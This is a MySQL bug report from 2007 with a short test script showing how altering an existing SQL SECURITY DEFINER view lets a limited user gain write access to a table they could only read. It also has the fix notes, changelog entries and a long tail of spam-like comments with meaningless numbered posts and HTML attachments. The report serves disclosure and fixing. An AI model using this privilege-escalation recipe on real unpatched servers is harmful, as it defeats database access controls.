Bug #29908 alter view keeps current definer, user can gain additioanl access
Submitted: 19 Jul 2007 19:57 Modified: 31 Oct 2007 2:18
Reporter: Martin Friebe (Gold Quality Contributor)
Status: Closed
Category:Server Severity:S3 (Non-critical)
Version:5.1.21 5.0.46 OS:FreeBSD
Assigned to: Evgeny Potemkin Target Version:5.1.23
Tags: VIEW, grant, backport_050050SP1

[19 Jul 2007 19:57] Martin Friebe 
Description:
If you alter a view, it keeps it current definer, and security.

This can be used to gain additional access.

Assume a user with:
- read access to a schema "db1".
- write access to a schema "db2"
- write access to ONE column "a" (with limitation to certain rows) through a view in db2 
  access to the table is given through SQL SECURITY DEFIENER
- the privilege to ALTER views (CREATE VIEW, DROP) in db2

the user can only insert update rows in db1.t1 as restricted by the views condition.

creating a new view will not grant him additional access to the table (as securit will be
invoker)

BUT altering the existing view, will grant that access (as security and definer are kept)

This means the user can get write access to any table that he has read access to.

How to repeat:
--disable_warnings
drop database if exists db1;
drop database if exists db2;
--enable_warnings

create database db1;
create database db2;

create table db1.t1 (a int, b int);
create SQL SECURITY DEFINER view db2.v1 as select a from db1.t1 where a > 10 WITH CHECK
OPTION;

create user 'u1'@'localhost';
grant SELECT on db1.* to 'u1'@'localhost';
grant SELECT, INSERT, UPDATE on db2.* to 'u1'@'localhost';
grant CREATE VIEW, DROP on db2.* to 'u1'@'localhost';

connect (conn1, localhost, u1, , db1);
connection conn1;

# not allowed a out of permitted range
--error 1369
insert into db2.v1 (a) values(1);

# cant create a view of his own to get full access t1
create view db2.v2 as select a,b from db1.t1;
--error 1356
insert into db2.v2 select 1,2;

# can alter existing view to gain full access to t1
alter view db2.v1 as select a,b from db1.t1;
insert into db2.v1 select 1,2;
select * from db1.t1;

connection default;

show create view db2.v1; # definer and security are unchanged

Suggested fix:
If a view is altered the definer should be changed.

"create or replace view" has the same issue
[20 Jul 2007 1:32] Miguel Solorzano 
Thank you for the bug report.
[20 Sep 2007 18:06] Bugs System 
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/34444

ChangeSet@1.2526, 2007-09-20 18:05:09+04:00, evgen@sunlight.local +3 -0
  Bug#29908: A user can gain additional access through the ALTER VIEW.
  
  Non-definer of a view was allowed to alter that view. Due to this the alterer
  can elevate his access rights to access rights of the view definer and thus
  modify data which he wasn't allowed to modify. A view defined with
  SQL SECURITY INVOKER can't be used directly for access rights elevation.
  But a user can first alter the view SQL code and then alter the view to 
  SQL SECURITY DEFINER and thus elevate his access rights. Due to this
  altering a view with SQL SECURITY INVOKER is also prohibited.
  
  Now the mysql_create_view function allows ALTER VIEW only to the view
  definer or a super user.
[29 Oct 2007 9:43] Bugs System 
Pushed into 5.0.52
[29 Oct 2007 9:46] Bugs System 
Pushed into 5.1.23-beta
[29 Oct 2007 9:50] Bugs System 
Pushed into 6.0.4-alpha
[31 Oct 2007 2:18] Paul DuBois 
Noted in 5.0.52, 5.1.23, 6.0.4 changelogs.

ALTER VIEW retained the original DEFINER value, even when altered by
another user, which could allow that user to gain the access rights 
of the view. Now ALTER VIEW is allowed only to the original definer
or users with the SUPER privilege.
[12 Dec 2007 11:55] Norbert Tretkowski 
When applying the patch to 5.0.51 and running the testsuite, the view_grant test fails.
[12 Dec 2007 11:56] Norbert Tretkowski 
view_grant failure

Attachment: view_grant-failure.log (text/x-log), 1.41 KiB.
[12 Dec 2007 15:12] Norbert Tretkowski 
The testsuite problem is fixed in 5.0-bk already.
[27 Apr 12:56] Derek Hval 
ssss
[27 Apr 12:58] Derek Hval 
aa

Attachment: aa.html (text/html), 3.56 KiB.
[5 Jul 15:51] Benjamin Kready 
1

Attachment: 1.html (text/html), 13.30 KiB.
[5 Jul 15:57] Benjamin Kready 
2

Attachment: 2.html (text/html), 14.62 KiB.
[5 Jul 16:00] Benjamin Kready 
3

Attachment: 3.html (text/html), 15.03 KiB.
[5 Jul 16:04] Benjamin Kready 
4

Attachment: 4.html (text/html), 13.47 KiB.
[5 Jul 16:12] Benjamin Kready 
5

Attachment: 5.html (text/html), 13.81 KiB.
[5 Jul 16:27] Benjamin Kready 
6

Attachment: 6.html (text/html), 14.02 KiB.
[5 Jul 16:29] Benjamin Kready 
7

Attachment: 7.html (text/html), 13.69 KiB.
[5 Jul 16:31] Benjamin Kready 
8

Attachment: 8.html (text/html), 15.64 KiB.
[5 Jul 16:33] Benjamin Kready 
9

Attachment: 9.html (text/html), 14.79 KiB.
[5 Jul 16:34] Benjamin Kready 
10

Attachment: 10.html (text/html), 13.09 KiB.
[5 Jul 16:36] Benjamin Kready 
10

Attachment: 10.html (text/html), 13.09 KiB.
[5 Jul 16:37] Benjamin Kready 
10

Attachment: 10.html (text/html), 13.09 KiB.
[5 Jul 16:39] Benjamin Kready 
11

Attachment: 11.html (text/html), 12.87 KiB.
[5 Jul 16:40] Benjamin Kready 
12

Attachment: 12.html (text/html), 15.29 KiB.
[5 Jul 16:43] Benjamin Kready 
13

Attachment: 13.html (text/html), 13.71 KiB.
[5 Jul 16:45] Benjamin Kready 
14

Attachment: 14.html (text/html), 14.50 KiB.
[5 Jul 16:47] Benjamin Kready 
15

Attachment: 15.html (text/html), 13.03 KiB.
[5 Jul 16:49] Benjamin Kready 
16

Attachment: 16.html (text/html), 15.18 KiB.
[5 Jul 16:51] Benjamin Kready 
17

Attachment: 17.html (text/html), 13.70 KiB.
[5 Jul 16:54] Benjamin Kready 
18

Attachment: 18.html (text/html), 14.84 KiB.
[5 Jul 16:56] Benjamin Kready 
19

Attachment: 19.html (text/html), 13.85 KiB.
[5 Jul 16:59] Benjamin Kready 
20

Attachment: 20.html (text/html), 14.39 KiB.
[5 Jul 17:05] Benjamin Kready 
21

Attachment: 21.html (text/html), 14.67 KiB.
[5 Jul 17:07] Benjamin Kready 
22

Attachment: 22.html (text/html), 15.29 KiB.
[5 Jul 17:09] Benjamin Kready 
23

Attachment: 23.html (text/html), 15.78 KiB.
[5 Jul 17:25] Benjamin Kready 
24

Attachment: 24.html (text/html), 13.82 KiB.
[5 Jul 17:27] Benjamin Kready 
25

Attachment: 25.html (text/html), 14.22 KiB.
[5 Jul 17:29] Benjamin Kready 
26

Attachment: 26.html (text/html), 15.34 KiB.
[5 Jul 17:32] Benjamin Kready 
27

Attachment: 27.html (text/html), 12.67 KiB.
[5 Jul 17:44] Benjamin Kready 
28

Attachment: 28.html (text/html), 13.89 KiB.
[5 Jul 17:53] Benjamin Kready 
29

Attachment: 29.html (text/html), 14.49 KiB.
[5 Jul 18:08] Benjamin Kready 
29

Attachment: 29.html (text/html), 14.49 KiB.
[5 Jul 18:09] Benjamin Kready 
29

Attachment: 29.html (text/html), 14.49 KiB.
[5 Jul 18:12] Benjamin Kready 
30

Attachment: 30.html (text/html), 13.18 KiB.
[5 Jul 18:17] Benjamin Kready 
31

Attachment: 31.html (text/html), 13.41 KiB.
[5 Jul 18:24] Benjamin Kready 
32

Attachment: 32.html (text/html), 14.80 KiB.
[5 Jul 18:29] Benjamin Kready 
33

Attachment: 33.html (text/html), 13.08 KiB.
[5 Jul 18:34] Benjamin Kready 
34

Attachment: 34.html (text/html), 15.00 KiB.
[5 Jul 18:38] Benjamin Kready 
35

Attachment: 35.html (text/html), 13.63 KiB.
[5 Jul 18:40] Benjamin Kready 
36

Attachment: 36.html (text/html), 12.92 KiB.
[5 Jul 18:41] Benjamin Kready 
37

Attachment: 37.html (text/html), 14.76 KiB.
[5 Jul 18:47] Benjamin Kready 
38

Attachment: 38.html (text/html), 13.74 KiB.
[5 Jul 18:49] Benjamin Kready 
39

Attachment: 39.html (text/html), 13.14 KiB.
[5 Jul 18:51] Benjamin Kready 
40

Attachment: 40.html (text/html), 14.46 KiB.
[5 Jul 18:52] Benjamin Kready 
41

Attachment: 41.html (text/html), 13.86 KiB.
[5 Jul 18:53] Benjamin Kready 
42

Attachment: 42.html (text/html), 13.29 KiB.
[5 Jul 18:54] Benjamin Kready 
43

Attachment: 43.html (text/html), 15.04 KiB.
[5 Jul 18:55] Benjamin Kready 
44

Attachment: 44.html (text/html), 14.26 KiB.
[5 Jul 18:56] Benjamin Kready 
45

Attachment: 45.html (text/html), 12.61 KiB.
[5 Jul 18:57] Benjamin Kready 
46

Attachment: 46.html (text/html), 15.31 KiB.
[5 Jul 18:58] Benjamin Kready 
47

Attachment: 47.html (text/html), 14.02 KiB.
[5 Jul 18:59] Benjamin Kready 
48

Attachment: 48.html (text/html), 12.86 KiB.
[5 Jul 19:00] Benjamin Kready 
49

Attachment: 49.html (text/html), 14.75 KiB.
[5 Jul 19:01] Benjamin Kready 
50

Attachment: 50.html (text/html), 14.73 KiB.